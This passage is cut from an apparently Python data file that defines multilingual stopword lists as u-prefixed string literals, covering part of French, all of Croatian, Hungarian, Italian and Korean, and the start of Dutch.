"tenant",u"tend",u"tenir",u"tente",u"tes",u"tic",u"tien",u"tienne",u"tiennes",u"tiens",u"toc",u"toi",u"toi-même",u"ton",u"touchant",u"toujours",u"tous",u"tout",u"toute",u"toutefois",u"toutes",u"treize",u"trente",u"tres",u"trois",u"troisième",u"troisièmement",u"trop",u"très",u"tsoin",u"tsouin",u"tu",u"té",u"u",u"un",u"une",u"unes",u"uniformement",u"unique",u"uniques",u"uns",u"v",u"va",u"vais",u"vas",u"vers",u"via",u"vif",u"vifs",u"vingt",u"vivat",u"vive",u"vives",u"vlan",u"voici",u"voilà",u"vont",u"vos",u"votre",u"vous",u"vous-mêmes",u"vu",u"vé",u"vôtre",u"vôtres",u"w",u"x",u"y",u"z",u"zut",u"à",u"â",u"ça",u"ès",u"étaient",u"étais",u"était",u"étant",u"été",u"être",u"ô"],u"hr":[u"a",u"ako",u"ali",u"bi",u"bih",u"bila",u"bili",u"bilo",u"bio",u"bismo",u"biste",u"biti",u"bumo",u"da",u"do",u"duž",u"ga",u"hoće",u"hoćemo",u"hoćete",u"hoćeš",u"hoću",u"i",u"iako",u"ih",u"ili",u"iz",u"ja",u"je",u"jedna",u"jedne",u"jedno",u"jer",u"jesam",u"jesi",u"jesmo",u"jest",u"jeste",u"jesu",u"jim",u"joj",u"još",u"ju",u"kada",u"kako",u"kao",u"
koja",u"koje",u"koji",u"kojima",u"koju",u"kroz",u"li",u"me",u"mene",u"meni",u"mi",u"mimo",u"moj",u"moja",u"moje",u"mu",u"na",u"nad",u"nakon",u"nam",u"nama",u"nas",u"naš",u"naša",u"naše",u"našeg",u"ne",u"nego",u"neka",u"neki",u"nekog",u"neku",u"nema",u"netko",u"neće",u"nećemo",u"nećete",u"nećeš",u"neću",u"nešto",u"ni",u"nije",u"nikoga",u"nikoje",u"nikoju",u"nisam",u"nisi",u"nismo",u"niste",u"nisu",u"njega",u"njegov",u"njegova",u"njegovo",u"njemu",u"njezin",u"njezina",u"njezino",u"njih",u"njihov",u"njihova",u"njihovo",u"njim",u"njima",u"njoj",u"nju",u"no",u"o",u"od",u"odmah",u"on",u"ona",u"oni",u"ono",u"ova",u"pa",u"pak",u"po",u"pod",u"pored",u"prije",u"s",u"sa",u"sam",u"samo",u"se",u"sebe",u"sebi",u"si",u"smo",u"ste",u"su",u"sve",u"svi",u"svog",u"svoj",u"svoja",u"svoje",u"svom",u"ta",u"tada",u"taj",u"tako",u"te",u"tebe",u"tebi",u"ti",u"to",u"toj",u"tome",u"tu",u"tvoj",u"tvoja",u"tvoje",u"u",u"uz",u"vam",u"vama",u"vas",u"vaš",u"vaša",u"vaše",u"već",u"vi",u"vrlo",u"za",u"zar",u"će",u"ćemo",u"ćete",u"ćeš",u"ću",u"što"],u"hu":[u"a",u"abba",u"abban",u"abból",u"addig",u"ahhoz",u"ahogy",u"ahol",u"aki",u"akik",u"akkor",u"akár",u"alapján",u"alatt",u"alatta",u"alattad",u"alattam",u"alattatok",u"alattuk",u"alattunk",u"alá",u"alád",u"alájuk",u"alám",u"alánk",u"alátok",u"alól",u"alóla",u"alólad",u"alólam",u"alólatok",u"alóluk",u"alólunk",u"amely",u"amelybol",u"amelyek",u"amelyekben",u"amelyeket",u"amelyet",u"amelyik",u"amelynek",u"ami",u"amikor",u"amit",u"amolyan",u"amott",u"amíg",u"annak",u"annál",u"arra",u"arról",u"attól",u"az",u"aznap",u"azok",u"azokat",u"azokba",u"azokban",u"azokból",u"azokhoz",u"azokig",u"azokkal",u"azokká",u"azoknak",u"azoknál",u"azokon",u"azokra",u"azokról",u"azoktól",u"azokért",u"azon",u"azonban",u"azonnal",u"azt",u"aztán",u"azután",u"azzal",u"azzá",u"azért",u"bal",u"balra",u"ban",u"be",u"belé",u"beléd",u"beléjük",u"belém",u"belénk",u"belétek",u"belül",u"belőle",u"belőled",u"belőlem",u"belőletek",u"belőlük",u"belőlünk",u"ben",u"benne",u"benned",u"bennem",u"bennetek",u"bennük",u"bennünk",u"bár",u"bárcsak",u"bármilyen",u"búcsú",u"cikk",u"cikkek",u"cikkeket",u"csak",u"csakhogy",u"csupán",u"de",u"dehogy",u"e",u"ebbe",u"ebben",u"ebből",u"eddig",u"egy",u"egyebek",u"egyebet",u"egyedül",u"egyelőre",u"egyes",u"egyet",u"egyetlen",u"egyik",u"egymás",u"egyre",u"egyszerre",u"egyéb",u"együtt",u"egész",u"egészen",u"ehhez",u"ekkor",u"el",u"eleinte",u"ellen",u"ellenes",u"elleni",u"ellenére",u"elmondta",u"első",u"elsők",u"elsősorban",u"elsőt",u"elé",u"eléd",u"elég",u"eléjük",u"elém",u"elénk",u"elétek",u"elő",u"előbb",u"elől",u"előle",u"előled",u"előlem",u"előletek",u"előlük",u"előlünk",u"először",u"előtt",u"előtte",u"előtted",u"előttem",u"előttetek",u"előttük",u"előttünk",u"előző",u"emilyen",u"engem",u"ennek",u"ennyi",u"ennél",u"enyém",u"erre",u"erről",u"esetben",u"ettől",u"ez",u"ezek",u"ezekbe",u"ezekben",u"ezekből",u"ezeken",u"ezeket",u"ezekhez",u"ezekig",u"ezekkel",u"ezekké",u"ezeknek",u"ezeknél",u"ezekre",u"ezekről",u"ezektől",u"ezekért",u"ezen",u"ezentúl",u"ezer",u"ezret",u"ezt",u"ezután",u"ezzel",u"ezzé",u"ezért",u"fel",u"fele",u"felek",u"felet",u"felett",u"felé",u"fent",u"fenti",u"fél",u"fölé",u"gyakran",u"ha",u"halló",u"hamar",u"hanem",u"harmadik",u"harmadikat",u"harminc",u"hat",u"hatodik",u"hatodikat",u"hatot",u"hatvan",u"helyett",u"hetedik",u"hetediket",u"hetet",u"hetven",u"hirtelen",u"hiszen",u"hiába",u"hogy",u"hogyan",u"hol",u"holnap",u"holnapot",u"honnan",u"hova",u"hozzá",u"hozzád",u"hozzájuk",u"hozzám",u"hozzánk",u"hozzátok",u"hurrá",u"huszadik",u"hány",u"hányszor",u"hármat",u"három"
,u"hát",u"hátha",u"hátulsó",u"hét",u"húsz",u"ide",u"ide-оda",u"idén",u"igazán",u"igen",u"ill",u"illetve",u"ilyen",u"ilyenkor",u"immár",u"inkább",u"is",u"ismét",u"ison",u"itt",u"jelenleg",u"jobban",u"jobbra",u"jó",u"jól",u"jólesik",u"jóval",u"jövőre",u"kell",u"kellene",u"kellett",u"kelljen",u"keressünk",u"keresztül",u"ketten",u"kettő",u"kettőt",u"kevés",u"ki",u"kiben",u"kiből",u"kicsit",u"kicsoda",u"kihez",u"kik",u"kikbe",u"kikben",u"kikből",u"kiken",u"kiket",u"kikhez",u"kikkel",u"kikké",u"kiknek",u"kiknél",u"kikre",u"kikről",u"kiktől",u"kikért",u"kilenc",u"kilencedik",u"kilencediket",u"kilencet",u"kilencven",u"kin",u"kinek",u"kinél",u"kire",u"kiről",u"kit",u"kitől",u"kivel",u"kivé",u"kié",u"kiért",u"korábban",u"képest",u"kérem",u"kérlek",u"kész",u"késő",u"később",u"későn",u"két",u"kétszer",u"kívül",u"körül",u"köszönhetően",u"köszönöm",u"közben",u"közel",u"közepesen",u"közepén",u"közé",u"között",u"közül",u"külön",u"különben",u"különböző",u"különbözőbb",u"különbözőek",u"lassan",u"le",u"legalább",u"legyen",u"lehet",u"lehetetlen",u"lehetett",u"lehetőleg",u"lehetőség",u"lenne",u"lenni",u"lennék",u"lennének",u"lesz",u"leszek",u"lesznek",u"leszünk",u"lett",u"lettek",u"lettem",u"lettünk",u"lévő",u"ma",u"maga",u"magad",u"magam",u"magatokat",u"magukat",u"magunkat",u"magát",u"mai",u"majd",u"majdnem",u"manapság",u"meg",u"megcsinál",u"megcsinálnak",u"megint",u"megvan",u"mellett",u"mellette",u"melletted",u"mellettem",u"mellettetek",u"mellettük",u"mellettünk",u"mellé",u"melléd",u"melléjük",u"mellém",u"mellénk",u"mellétek",u"mellől",u"mellőle",u"mellőled",u"mellőlem",u"mellőletek",u"mellőlük",u"mellőlünk",u"mely",u"melyek",u"melyik",u"mennyi",u"mert",u"mi",u"miatt",u"miatta",u"miattad",u"miattam",u"miattatok",u"miattuk",u"miattunk",u"mibe",u"miben",u"miből",u"mihez",u"mik",u"mikbe",u"mikben",u"mikből",u"miken",u"miket",u"mikhez",u"mikkel",u"mikké",u"miknek",u"miknél",u"mikor",u"mikre",u"mikről",u"miktől",u"mikért",u"milyen",u"min",u"mind",u"mindegyik",u"mindegyiket",u"minden",u"mindenesetre",u"mindenki",u"mindent",u"mindenütt",u"mindig",u"mindketten",u"minek",u"minket",u"mint",u"mintha",u"minél",u"mire",u"miről",u"mit",u"mitől",u"mivel",u"mivé",u"miért",u"mondta",u"most",u"mostanáig",u"már",u"más",u"másik",u"másikat",u"másnap",u"második",u"másodszor",u"mások",u"másokat",u"mást",u"még",u"mégis",u"míg",u"mögé",u"mögéd",u"mögéjük",u"mögém",u"mögénk",u"mögétek",u"mögött",u"mögötte",u"mögötted",u"mögöttem",u"mögöttetek",u"mögöttük",u"mögöttünk",u"mögül",u"mögüle",u"mögüled",u"mögülem",u"mögületek",u"mögülük",u"mögülünk",u"múltkor",u"múlva",u"na",u"nagy",u"nagyobb",u"nagyon",u"naponta",u"napot",u"ne",u"negyedik",u"negyediket",u"negyven",u"neked",u"nekem",u"neki",u"nekik",u"nektek",u"nekünk",u"nem",u"nemcsak",u"nemrég",u"nincs",u"nyolc",u"nyolcadik",u"nyolcadikat",u"nyolcat",u"nyolcvan",u"nála",u"nálad",u"nálam",u"nálatok",u"náluk",u"nálunk",u"négy",u"négyet",u"néha",u"néhány",u"nélkül",u"o",u"oda",u"ok",u"olyan",u"onnan",u"ott",u"pedig",u"persze",u"pár",u"például",u"rajta",u"rajtad",u"rajtam",u"rajtatok",u"rajtuk",u"rajtunk",u"rendben",u"rosszul",u"rá",u"rád",u"rájuk",u"rám",u"ránk",u"rátok",u"régen",u"régóta",u"részére",u"róla",u"rólad",u"rólam",u"rólatok",u"róluk",u"rólunk",u"rögtön",u"s",u"saját",u"se",u"sem",u"semmi",u"semmilyen",u"semmiség",u"senki",u"soha",u"sok",u"sokan",u"sokat",u"sokkal",u"sokszor",u"sokáig",u"során",u"stb.",u"szemben",u"szerbusz",u"szerint",u"szerinte",u"szerinted",u"szerintem",u"szerintetek",u"szerintük",u"szerintünk",u"szervusz",u"szinte",u"számára",u"száz",u"századik",u"százat",u"sz
épen",u"szét",u"szíves",u"szívesen",u"szíveskedjék",u"sőt",u"talán",u"tavaly",u"te",u"tegnap",u"tegnapelőtt",u"tehát",u"tele",u"teljes",u"tessék",u"ti",u"tied",u"titeket",u"tizedik",u"tizediket",u"tizenegy",u"tizenegyedik",u"tizenhat",u"tizenhárom",u"tizenhét",u"tizenkettedik",u"tizenkettő",u"tizenkilenc",u"tizenkét",u"tizennyolc",u"tizennégy",u"tizenöt",u"tizet",u"tovább",u"további",u"továbbá",u"távol",u"téged",u"tényleg",u"tíz",u"több",u"többi",u"többször",u"túl",u"tőle",u"tőled",u"tőlem",u"tőletek",u"tőlük",u"tőlünk",u"ugyanakkor",u"ugyanez",u"ugyanis",u"ugye",u"urak",u"uram",u"urat",u"utoljára",u"utolsó",u"után",u"utána",u"vagy",u"vagyis",u"vagyok",u"vagytok",u"vagyunk",u"vajon",u"valahol",u"valaki",u"valakit",u"valamelyik",u"valami",u"valamint",u"való",u"van",u"vannak",u"vele",u"veled",u"velem",u"veletek",u"velük",u"velünk",u"vissza",u"viszlát",u"viszont",u"viszontlátásra",u"volna",u"volnának",u"volnék",u"volt",u"voltak",u"voltam",u"voltunk",u"végre",u"végén",u"végül",u"által",u"általában",u"ám",u"át",u"éljen",u"én",u"éppen",u"érte",u"érted",u"értem",u"értetek",u"értük",u"értünk",u"és",u"év",u"évben",u"éve",u"évek",u"éves",u"évi",u"évvel",u"így",u"óta",u"ön",u"önbe",u"önben",u"önből",u"önhöz",u"önnek",u"önnel",u"önnél",u"önre",u"önről",u"önt",u"öntől",u"önért",u"önök",u"önökbe",u"önökben",u"önökből",u"önöket",u"önökhöz",u"önökkel",u"önöknek",u"önöknél",u"önökre",u"önökről",u"önöktől",u"önökért",u"önökön",u"önön",u"össze",u"öt",u"ötven",u"ötödik",u"ötödiket",u"ötöt",u"úgy",u"úgyis",u"úgynevezett",u"új",u"újabb",u"újra",u"úr",u"ő",u"ők",u"őket",u"őt"],u"it":[u"IE",u"a",u"abbastanza",u"abbia",u"abbiamo",u"abbiano",u"abbiate",u"accidenti",u"ad",u"adesso",u"affinche",u"agl",u"agli",u"ahime",u"ahimè",u"ai",u"al",u"alcuna",u"alcuni",u"alcuno",u"all",u"alla",u"alle",u"allo",u"allora",u"altri",u"altrimenti",u"altro",u"altrove",u"altrui",u"anche",u"ancora",u"anni",u"anno",u"ansa",u"anticipo",u"assai",u"attesa",u"attraverso",u"avanti",u"avemmo",u"avendo",u"avente",u"aver",u"avere",u"averlo",u"avesse",u"avessero",u"avessi",u"avessimo",u"aveste",u"avesti",u"avete",u"aveva",u"avevamo",u"avevano",u"avevate",u"avevi",u"avevo",u"avrai",u"avranno",u"avrebbe",u"avrebbero",u"avrei",u"avremmo",u"avremo",u"avreste",u"avresti",u"avrete",u"avrà",u"avrò",u"avuta",u"avute",u"avuti",u"avuto",u"basta",u"bene",u"benissimo",u"berlusconi",u"brava",u"bravo",u"c",u"casa",u"caso",u"cento",u"certa",u"certe",u"certi",u"certo",u"che",u"chi",u"chicchessia",u"chiunque",u"ci",u"ciascuna",u"ciascuno",u"cima",u"cio",u"cioe",u"cioè",u"circa",u"citta",u"città",u"ciò",u"co",u"codesta",u"codesti",u"codesto",u"cogli",u"coi",u"col",u"colei",u"coll",u"coloro",u"colui",u"come",u"cominci",u"comunque",u"con",u"concernente",u"conciliarsi",u"conclusione",u"consiglio",u"contro",u"cortesia",u"cos",u"cosa",u"cosi",u"così",u"cui",u"d",u"da",u"dagl",u"dagli",u"dai",u"dal",u"dall",u"dalla",u"dalle",u"dallo",u"dappertutto",u"davanti",u"degl",u"degli",u"dei",u"del",u"dell",u"della",u"delle",u"dello",u"dentro",u"detto",u"deve",u"di",u"dice",u"dietro",u"dire",u"dirimpetto",u"diventa",u"diventare",u"diventato",u"dopo",u"dov",u"dove",u"dovra",u"dovrà",u"dovunque",u"due",u"dunque",u"durante",u"e",u"ebbe",u"ebbero",u"ebbi",u"ecc",u"ecco",u"ed",u"effettivamente",u"egli",u"ella",u"entrambi",u"eppure",u"era",u"erano",u"eravamo",u"eravate",u"eri",u"ero",u"esempio",u"esse",u"essendo",u"esser",u"essere",u"essi",u"ex",u"fa",u"faccia",u"facciamo",u"facciano",u"facciate",u"faccio",u"facemmo",u"facendo",u"facesse",u"facessero",u"facessi",u"facessimo",u"faceste",
u"facesti",u"faceva",u"facevamo",u"facevano",u"facevate",u"facevi",u"facevo",u"fai",u"fanno",u"farai",u"faranno",u"fare",u"farebbe",u"farebbero",u"farei",u"faremmo",u"faremo",u"fareste",u"faresti",u"farete",u"farà",u"farò",u"fatto",u"favore",u"fece",u"fecero",u"feci",u"fin",u"finalmente",u"finche",u"fine",u"fino",u"forse",u"forza",u"fosse",u"fossero",u"fossi",u"fossimo",u"foste",u"fosti",u"fra",u"frattempo",u"fu",u"fui",u"fummo",u"fuori",u"furono",u"futuro",u"generale",u"gia",u"giacche",u"giorni",u"giorno",u"già",u"gli",u"gliela",u"gliele",u"glieli",u"glielo",u"gliene",u"governo",u"grande",u"grazie",u"gruppo",u"ha",u"haha",u"hai",u"hanno",u"ho",u"i",u"ieri",u"il",u"improvviso",u"in",u"inc",u"infatti",u"inoltre",u"insieme",u"intanto",u"intorno",u"invece",u"io",u"l",u"la",u"lasciato",u"lato",u"lavoro",u"le",u"lei",u"li",u"lo",u"lontano",u"loro",u"lui",u"lungo",u"luogo",u"là",u"ma",u"macche",u"magari",u"maggior",u"mai",u"male",u"malgrado",u"malissimo",u"mancanza",u"marche",u"me",u"medesimo",u"mediante",u"meglio",u"meno",u"mentre",u"mesi",u"mezzo",u"mi",u"mia",u"mie",u"miei",u"mila",u"miliardi",u"milioni",u"minimi",u"ministro",u"mio",u"modo",u"molti",u"moltissimo",u"molto",u"momento",u"mondo",u"mosto",u"nazionale",u"ne",u"negl",u"negli",u"nei",u"nel",u"nell",u"nella",u"nelle",u"nello",u"nemmeno",u"neppure",u"nessun",u"nessuna",u"nessuno",u"niente",u"no",u"noi",u"non",u"nondimeno",u"nonostante",u"nonsia",u"nostra",u"nostre",u"nostri",u"nostro",u"novanta",u"nove",u"nulla",u"nuovo",u"o",u"od",u"oggi",u"ogni",u"ognuna",u"ognuno",u"oltre",u"oppure",u"ora",u"ore",u"osi",u"ossia",u"ottanta",u"otto",u"paese",u"parecchi",u"parecchie",u"parecchio",u"parte",u"partendo",u"peccato",u"peggio",u"per",u"perche",u"perchè",u"perché",u"percio",u"perciò",u"perfino",u"pero",u"persino",u"persone",u"però",u"piedi",u"pieno",u"piglia",u"piu",u"piuttosto",u"più",u"po",u"pochissimo",u"poco",u"poi",u"poiche",u"possa",u"possedere",u"posteriore",u"posto",u"potrebbe",u"preferibilmente",u"presa",u"press",u"prima",u"primo",u"principalmente",u"probabilmente",u"proprio",u"puo",u"pure",u"purtroppo",u"può",u"qualche",u"qualcosa",u"qualcuna",u"qualcuno",u"quale",u"quali",u"qualunque",u"quando",u"quanta",u"quante",u"quanti",u"quanto",u"quantunque",u"quasi",u"quattro",u"quel",u"quella",u"quelle",u"quelli",u"quello",u"quest",u"questa",u"queste",u"questi",u"questo",u"qui",u"quindi",u"realmente",u"recente",u"recentemente",u"registrazione",u"relativo",u"riecco",u"salvo",u"sara",u"sarai",u"saranno",u"sarebbe",u"sarebbero",u"sarei",u"saremmo",u"saremo",u"sareste",u"saresti",u"sarete",u"sarà",u"sarò",u"scola",u"scopo",u"scorso",u"se",u"secondo",u"seguente",u"seguito",u"sei",u"sembra",u"sembrare",u"sembrato",u"sembri",u"sempre",u"senza",u"sette",u"si",u"sia",u"siamo",u"siano",u"siate",u"siete",u"sig",u"solito",u"solo",u"soltanto",u"sono",u"sopra",u"sotto",u"spesso",u"srl",u"sta",u"stai",u"stando",u"stanno",u"starai",u"staranno",u"starebbe",u"starebbero",u"starei",u"staremmo",u"staremo",u"stareste",u"staresti",u"starete",u"starà",u"starò",u"stata",u"state",u"stati",u"stato",u"stava",u"stavamo",u"stavano",u"stavate",u"stavi",u"stavo",u"stemmo",u"stessa",u"stesse",u"stessero",u"stessi",u"stessimo",u"stesso",u"steste",u"stesti",u"stette",u"stettero",u"stetti",u"stia",u"stiamo",u"stiano",u"stiate",u"sto",u"su",u"sua",u"subito",u"successivamente",u"successivo",u"sue",u"sugl",u"sugli",u"sui",u"sul",u"sull",u"sulla",u"sulle",u"sullo",u"suo",u"suoi",u"tale",u"tali",u"talvolta",u"tanto",u"te",u"tempo",u"ti",u"titolo",u"torino",u"tra",u"tranne",u"tre",
u"trenta",u"troppo",u"trovato",u"tu",u"tua",u"tue",u"tuo",u"tuoi",u"tutta",u"tuttavia",u"tutte",u"tutti",u"tutto",u"uguali",u"ulteriore",u"ultimo",u"un",u"una",u"uno",u"uomo",u"va",u"vale",u"vari",u"varia",u"varie",u"vario",u"verso",u"vi",u"via",u"vicino",u"visto",u"vita",u"voi",u"volta",u"volte",u"vostra",u"vostre",u"vostri",u"vostro",u"è"],u"ko":[u"!",u"\"",u"$",u"%",u"&",u"'",u"(",u")",u"*",u"+",u",u",u"-",u".",u"...",u"0",u"1",u"2",u"3",u"4",u"5",u"6",u"7",u"8",u"9",u";",u"<",u"=",u">",u"?",u"@",u"\\",u"^",u"_",u"`",u"|",u"~",u"·",u"—",u"——",u"‘",u"’",u"“",u"”",u"…",u"、",u"。",u"〈",u"〉",u"《",u"》",u"가",u"가까스로",u"가령",u"각",u"각각",u"각자",u"각종",u"갖고말하자면",u"같다",u"같이",u"개의치않고",u"거니와",u"거바",u"거의",u"것",u"것과 같이",u"것들",u"게다가",u"게우다",u"겨우",u"견지에서",u"결과에 이르다",u"결국",u"결론을 낼 수 있다",u"겸사겸사",u"고려하면",u"고로",u"곧",u"공동으로",u"과",u"과연",u"관계가 있다",u"관계없이",u"관련이 있다",u"관하여",u"관한",u"관해서는",u"구",u"구체적으로",u"구토하다",u"그",u"그들",u"그때",u"그래",u"그래도",u"그래서",u"그러나",u"그러니",u"그러니까",u"그러면",u"그러므로",u"그러한즉",u"그런 까닭에",u"그런데",u"그런즉",u"그럼",u"그럼에도 불구하고",u"그렇게 함으로써",u"그렇지",u"그렇지 않다면",u"그렇지 않으면",u"그렇지만",u"그렇지않으면",u"그리고",u"그리하여",u"그만이다",u"그에 따르는",u"그위에",u"그저",u"그중에서",u"그치지 않다",u"근거로",u"근거하여",u"기대여",u"기점으로",u"기준으로",u"기타",u"까닭으로",u"까악",u"까지",u"까지 미치다",u"까지도",u"꽈당",u"끙끙",u"끼익",u"나",u"나머지는",u"남들",u"남짓",u"너",u"너희",u"너희들",u"네",u"넷",u"년",u"논하지 않다",u"놀라다",u"누가 알겠는가",u"누구",u"다른",u"다른 방면으로",u"다만",u"다섯",u"다소",u"다수",u"다시 말하자면",u"다시말하면",u"다음",u"다음에",u"다음으로",u"단지",u"답다",u"당신",u"당장",u"대로 하다",u"대하면",u"대하여",u"대해 말하자면",u"대해서",u"댕그",u"더구나",u"더군다나",u"더라도",u"더불어",u"더욱더",u"더욱이는",u"도달하다",u"도착하다",u"동시에",u"동안",u"된바에야",u"된이상",u"두번째로",u"둘",u"둥둥",u"뒤따라",u"뒤이어",u"든간에",u"들",u"등",u"등등",u"딩동",u"따라",u"따라서",u"따위",u"따지지 않다",u"딱",u"때",u"때가 되어",u"때문에",u"또",u"또한",u"뚝뚝",u"라 해도",u"령",u"로",u"로 인하여",u"로부터",u"로써",u"륙",u"를",u"마음대로",u"마저",u"마저도",u"마치",u"막론하고",u"만 못하다",u"만약",u"만약에",u"만은 아니다",u"만이 아니다",u"만일",u"만큼",u"말하자면",u"말할것도 없고",u"매",u"매번",u"메쓰겁다",u"몇",u"모",u"모두",u"무렵",u"무릎쓰고",u"무슨",u"무엇",u"무엇때문에",u"물론",u"및",u"바꾸어말하면",u"바꾸어말하자면",u"바꾸어서 말하면",u"바꾸어서 한다면",u"바꿔 말하면",u"바로",u"바와같이",u"밖에 안된다",u"반대로",u"반대로 말하자면",u"반드시",u"버금",u"보는데서",u"보다더",u"보드득",u"본대로",u"봐",u"봐라",u"부류의 사람들",u"부터",u"불구하고",u"불문하고",u"붕붕",u"비걱거리다",u"비교적",u"비길수 없다",u"비로소",u"비록",u"비슷하다",u"비추어 보아",u"비하면",u"뿐만 아니라",u"뿐만아니라",u"뿐이다",u"삐걱",u"삐걱거리다",u"사",u"삼",u"상대적으로 말하자면",u"생각한대로",u"설령",u"설마",u"설사",u"셋",u"소생",u"소인",u"솨",u"쉿",u"습니까",u"습니다",u"시각",u"시간",u"시작하여",u"시초에",u"시키다",u"실로",u"심지어",u"아",u"아니",u"아니나다를가",u"아니라면",u"아니면",u"아니었다면",u"아래윗",u"아무거나",u"아무도",u"아야",u"아울러",u"아이",u"아이고",u"아이구",u"아이야",u"아이쿠",u"아하",u"아홉",u"안 그러면",u"않기 위하여",u"않기 위해서",u"알 수 있다",u"알았어",u"앗",u"앞에서",u"앞의것",u"야",u"약간",u"양자",u"어",u"어기여차",u"어느",u"어느 년도",u"어느것",u"어느곳",u"어느때",u"어느쪽",u"어느해",u"어디",u"어때",u"어떠한",u"어떤",u"어떤것",u"어떤것들",u"어떻게",u"어떻해",u"어이",u"어째서",u"어쨋든",u"어쩔수 없다",u"어찌",u"어찌됏든",u"어찌됏어",u"어찌하든지",u"어찌하여",u"언제",u"언젠가",u"얼마",u"얼마 안 되는 것",u"얼마간",u"얼마나",u"얼마든지",u"얼마만큼",u"얼마큼",u"엉엉",u"에",u"에 가서",u"에 달려 있다",u"에 대해",u"에 있다",u"에 한하다",u"에게",u"에서",u"여",u"여기",u"여덟",u"여러분",u"여보시오",u"여부",u"여섯",u"여전히",u"여차",u"연관되다",u"연이서",u"영",u"영차",u"옆사람",u"예",u"예를 들면",u"예를 들자면",u"예컨대",u"예하면",u"오",u"오로지",u"오르다",u"오자마자",u"오직",u"오호",u"오히려",u"와",u"와 같은 사람들",u"와르르",u"와아",u"왜",u"왜냐하면",u"외에도",u"요만큼",u"요만한 것",u"요만한걸",u"요컨대",u"우르르",u"우리",u"우리들",u"우선",u"우에 종합한것과같이",u"운운",u"월",u"위에서 서술한바와같이",u"위하여",u"위해서",u"윙윙",u"육",u"으로",u"으로 인하여",u"으로서",u"으로써",u"을",u"응",u"응당",u"의",u"의거하여",u"의지하여",u"의해",u"의해되다",u"의해서",u"이",u"이 되다",u"이 때문에",u"이 밖에",u"이 외에",u"이 정도의",u"이것",u"이곳",u"이때",u"이라면",u"이래",u"이러이러하다",u"이러한",u"이런",u"이럴정도로",u"이렇게 많은 것",u"이렇게되면",u"이렇게말하자면",u"이렇구나",u"이로 
인하여",u"이르기까지",u"이리하여",u"이만큼",u"이번",u"이봐",u"이상",u"이어서",u"이었다",u"이와 같다",u"이와 같은",u"이와 반대로",u"이와같다면",u"이외에도",u"이용하여",u"이유만으로",u"이젠",u"이지만",u"이쪽",u"이천구",u"이천육",u"이천칠",u"이천팔",u"인 듯하다",u"인젠",u"일",u"일것이다",u"일곱",u"일단",u"일때",u"일반적으로",u"일지라도",u"임에 틀림없다",u"입각하여",u"입장에서",u"잇따라",u"있다",u"자",u"자기",u"자기집",u"자마자",u"자신",u"잠깐",u"잠시",u"저",u"저것",u"저것만큼",u"저기",u"저쪽",u"저희",u"전부",u"전자",u"전후",u"점에서 보아",u"정도에 이르다",u"제",u"제각기",u"제외하고",u"조금",u"조차",u"조차도",u"졸졸",u"좀",u"좋아",u"좍좍",u"주룩주룩",u"주저하지 않고",u"줄은 몰랏다",u"줄은모른다",u"중에서",u"중의하나",u"즈음하여",u"즉",u"즉시",u"지든지",u"지만",u"지말고",u"진짜로",u"쪽으로",u"차라리",u"참",u"참나",u"첫번째로",u"쳇",u"총적으로",u"총적으로 말하면",u"총적으로 보면",u"칠",u"콸콸",u"쾅쾅",u"쿵",u"타다",u"타인",u"탕탕",u"토하다",u"통하여",u"툭",u"퉤",u"틈타",u"팍",u"팔",u"퍽",u"펄렁",u"하",u"하게될것이다",u"하게하다",u"하겠는가",u"하고 있다",u"하고있었다",u"하곤하였다",u"하구나",u"하기 때문에",u"하기 위하여",u"하기는한데",u"하기만 하면",u"하기보다는",u"하기에",u"하나",u"하느니",u"하는 김에",u"하는 편이 낫다",u"하는것도",u"하는것만 못하다",u"하는것이 낫다",u"하는바",u"하더라도",u"하도다",u"하도록시키다",u"하도록하다",u"하든지",u"하려고하다",u"하마터면",u"하면 할수록",u"하면된다",u"하면서",u"하물며",u"하여금",u"하여야",u"하자마자",u"하지 않는다면",u"하지 않도록",u"하지마",u"하지마라",u"하지만",u"하하",u"한 까닭에",u"한 이유는",u"한 후",u"한다면",u"한다면 몰라도",u"한데",u"한마디",u"한적이있다",u"한켠으로는",u"한항목",u"할 따름이다",u"할 생각이다",u"할 줄 안다",u"할 지경이다",u"할 힘이 있다",u"할때",u"할만하다",u"할망정",u"할뿐",u"할수있다",u"할수있어",u"할줄알다",u"할지라도",u"할지언정",u"함께",u"해도된다",u"해도좋다",u"해봐요",u"해서는 안된다",u"해야한다",u"해요",u"했어요",u"향하다",u"향하여",u"향해서",u"허",u"허걱",u"허허",u"헉",u"헉헉",u"헐떡헐떡",u"형식으로 쓰여",u"혹시",u"혹은",u"혼자",u"훨씬",u"휘익",u"휴",u"흐흐",u"흥",u"힘입어",u"︿",u"!",u"#",u"$",u"%",u"&",u"(",u")",u"*",u"+",u",",u"0",u"1",u"2",u"3",u"4",u"5",u"6",u"7",u"8",u"9",u":",u";",u"<",u">",u"?",u"@",u"[",u"]",u"{",u"|",u"}",u"~",u"¥"],u"nl":[u"aan",u"achte",u"achter",u"af",u"al",u"alle",u"alleen",u"alles",u"als",u"ander",u"anders",u"beetje",u"behalve",u"beide",u"beiden",u"ben",u"beneden",u"bent",u"bij",u"bijna",u"bijv",u"blijkbaar",u"blijken",u"boven",u"bv",u"daar",u"daardoor",u"daarin",u"daarna",u"daarom",u"daaruit",u"dan",u"dat",u"de",u"deden",u"deed",u"derde",u"derhalve",u"dertig",u"deze",u"dhr",u"die",u"dit",u"doe",u"doen",u"doet",u"door",u"drie",u"duizend",u"echter",u"een",u"eens",u"eerst",u"eerste",u"eigen",u"eigenlijk",u"elk",u"elke",u"en",u"enige",u"er",u"erg",u"ergens",u"etc",u"etcetera",u"even",u"geen",u"genoeg",u"geweest",u"haar",u"haarzelf",u"had",u"hadden",u"heb",u"hebben",u"hebt",u"hedden",u"heeft",u"heel",u"hem",u"hemzelf",u"hen",u"het",u"hetzelfde",u"hier",u"hierin",u"hierna",u"hierom",u"hij",u"hijzelf",u"hoe",u"honderd",u"hun",u"ieder",u"iedere",u"iedereen",u"iemand",u"iets",u"ik",u"in",u"inderdaad",u"intussen",u"is",u"ja",u"je",u"jij",u"jijzelf",u"jou",u"jouw",u"jullie",u"kan",u"kon",u"konden",u"kun",u"kunnen",u"kunt",u"laatst",u"later",u"lijken",u"lijkt",u"maak",u"maakt",u"maakte",u"maakten",u"maar",u"mag",u"maken",u"me",u"meer",u"meest",u"meestal",u"men",u"met",u"mevr",u"mij",u"mijn",u"minder",u"miss",u"misschien",u"missen",u"mits",u"mocht",u"mochten",u"moest",u"moesten",u"moet",u"moeten",u"mogen",u"mr",u"mrs",u"mw",u"na",u"naar",u"nam",u"namelijk",u"nee",u"neem",u"negen",u"nemen",u"nergens",u"niemand",u"niet",u"niets",u"niks",u"noch",u"nochtans",u"nog",u"nooit",u"nu",u"